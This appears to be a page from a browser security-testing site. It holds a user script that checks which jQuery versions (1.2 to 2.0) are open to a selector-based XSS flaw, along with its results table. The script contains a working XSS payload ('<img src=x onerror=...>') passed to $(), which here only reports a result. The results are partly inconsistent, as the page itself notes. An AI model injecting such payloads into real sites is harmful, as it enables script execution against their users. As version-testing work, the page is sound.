Test

Test

By
infosec_n00b 0 Seen 117 times
Tags
JqueryXSS

Results


Tested on
Chrome - 64 - Windows 10
jQuery Version | Is it Vulnerable?
jQuery 1.10.2 | Safe
jQuery 2.0.3 | Safe
jQuery 2.0.2 | Safe
jQuery 2.0.0 | Safe
jQuery 1.10.1 | Safe
jQuery 1.10.0 | Safe
jQuery 1.9.1 | Safe
jQuery 1.9.0 | Safe
jQuery 2.0.1 | Safe
1.2.14 | Some Error Occured
jQuery 1.8.3 | Vulnerable
jQuery 1.8.2 | Vulnerable
jQuery 1.6.3 | Vulnerable
jQuery 1.6.1 | Vulnerable
jQuery 1.7.1 | Vulnerable
jQuery 1.8.0 | Vulnerable
jQuery 1.6.2 | Vulnerable
jQuery 1.8.1 | Vulnerable
jQuery 1.5.1 | Safe
jQuery 1.7.2 | Vulnerable
jQuery 1.7.0 | Vulnerable
jQuery 1.6.4 | Vulnerable
jQuery 1.3.2 | Vulnerable
jQuery 1.5.0 | Vulnerable
jQuery 1.4.4 | Vulnerable
jQuery 1.5.2 | Vulnerable
jQuery 1.4.0 | Vulnerable
jQuery 1.6.0 | Vulnerable
jQuery 1.4.2 | Vulnerable
jQuery 1.4.1 | Vulnerable
jQuery 1.3.1 | Vulnerable
jQuery 1.3.0 | Vulnerable
jQuery 1.2.6 | Vulnerable
jQuery 1.4.3 | Vulnerable

Note: the 1.5.1 row reads Safe although 1.5.0 and 1.5.2 read Vulnerable, and 1.2.3 from the enum data has no row, so individual rows should be re-checked before they are relied on.

User Script (ENUM_FUNCTION)

					
// Custom Functions
// Version label used in the result rows. test() writes it and
// vulnerable()/safe() read it when they report.
var jQuery_version = '';

/**
 * Record the version currently held in jQuery_version as vulnerable.
 * The status cell is handed over as an HTML fragment (bold text), so the
 * harness's addError presumably renders markup - confirm against the harness.
 */
function vulnerable(){
    var rowLabel = 'jQuery ' + jQuery_version;
    var rowStatus = '<b>Vulnerable</b>';
    addError(rowLabel, rowStatus);
}

/**
 * Record the version currently held in jQuery_version as safe, i.e. the
 * probe did not end up running the injected handler.
 */
function safe(){
    var rowLabel = 'jQuery ' + jQuery_version;
    addSuccess(rowLabel, 'Safe');
}
    
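/**
 * Remove the probe iframe registered under the id 'jQueryFrameID'.
 *
 * Safe to call when the frame is already gone: a missing or detached
 * element is ignored instead of raising a TypeError, which matters because
 * this is invoked from callbacks running inside the frame itself.
 *
 * If more than one element carries this id, getElementById returns only the
 * first match, so the frame removed is not necessarily the caller's own.
 */
function removeIframe(){
    var frame = document.getElementById('jQueryFrameID');
    if (!frame || !frame.parentNode) {
        return;
    }
    frame.parentNode.removeChild(frame);
}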

// Test Function
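/**
 * Load one jQuery release from the Google CDN inside a throw-away iframe and
 * report whether a selector-like string that also contains markup is turned
 * into DOM nodes (which lets the inline onerror handler run).
 *
 * Outcomes, reported through the harness callbacks:
 *   - vulnerable(): the inline handler ran, i.e. jQuery built the element;
 *   - safe():       the $() call threw instead;
 *   - addResult(data, 'Some Error Occured'): the CDN script failed to load;
 *   - addInfo(data, 'Some Error Occured'):   setting up the frame threw.
 *
 * NOTE(review): if $() neither throws nor builds the element, nothing is
 * reported and the frame stays in the page; no timeout covers that case.
 *
 * @param {string} data jQuery version number as it appears in the CDN path.
 */
function test(data){
    try{
        jQuery_version = data;
        var version = String(data);
        var jQueryFrame = document.createElement('iframe');
        jQueryFrame.id = 'jQueryFrameID';

        // Remove this run's frame by reference. Every frame gets the same id,
        // so an id lookup could pick a frame that belongs to another version
        // whose script is still loading.
        var dropFrame = function(){
            if (jQueryFrame.parentNode) {
                jQueryFrame.parentNode.removeChild(jQueryFrame);
            }
        };

        // Per-run reporter. vulnerable()/safe() label the row from the shared
        // jQuery_version global, so it is set again at report time; otherwise
        // a run started in the meantime would put its own version on this row.
        var report = function(isVulnerable){
            jQuery_version = data;
            try {
                if (isVulnerable) {
                    vulnerable();
                } else {
                    safe();
                }
            } finally {
                dropFrame();
            }
        };

        jQueryFrame.onload = function(){
            var frameWindow = jQueryFrame.contentWindow;
            var frameDocument = frameWindow.document;

            // Exposed on the frame's own window so the probe script reports
            // for this version only.
            frameWindow.reportResult = report;

            var jQueryScript = frameDocument.createElement('script');
            jQueryScript.type = 'text/javascript';

            // Handlers are attached before the element is inserted.
            jQueryScript.onload = function(){
                var exploitScript = "try{function bad(){reportResult(true);} $('. <img src=x onerror=bad();>');} catch(err){reportResult(false);}";
                var exploit = frameDocument.createElement('script');
                exploit.type = 'text/javascript';
                // Script source is plain text, not markup.
                exploit.text = exploitScript;
                frameDocument.body.appendChild(exploit);
            };
            jQueryScript.onerror = function(){
                addResult(data, 'Some Error Occured');
                // Without this the frame of a failed load stays in the page.
                dropFrame();
            };

            // The version is encoded so it can only ever fill one path segment.
            jQueryScript.src = 'https://ajax.googleapis.com/ajax/libs/jquery/' + encodeURIComponent(version) + '/jquery.min.js';
            frameDocument.body.appendChild(jQueryScript);
        };
        document.body.appendChild(jQueryFrame);
    }
    catch(err){
        addInfo(data, 'Some Error Occured');
    }
}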
					
				
					
				

Enum Data (ENUM_FUNCTION)

					
// Version numbers to probe, one test() run per entry. Source: the jQuery
// versions listed under https://developers.google.com/speed/libraries/devguide#jquery
// Order is kept exactly as published on the page; '1.2.14' is the entry that
// produced "Some Error Occured" in the recorded results.
var data = [].concat(
    ['2.0.3', '1.2.14', '2.0.2', '2.0.1', '2.0.0'],
    ['1.10.2', '1.10.1', '1.10.0'],
    ['1.9.1', '1.9.0'],
    ['1.8.3', '1.8.2', '1.8.1', '1.8.0'],
    ['1.7.2', '1.7.1', '1.7.0'],
    ['1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0'],
    ['1.5.2', '1.5.1', '1.5.0'],
    ['1.4.4', '1.4.3', '1.4.2', '1.4.1', '1.4.0'],
    ['1.3.2', '1.3.1', '1.3.0'],
    ['1.2.6', '1.2.3']
);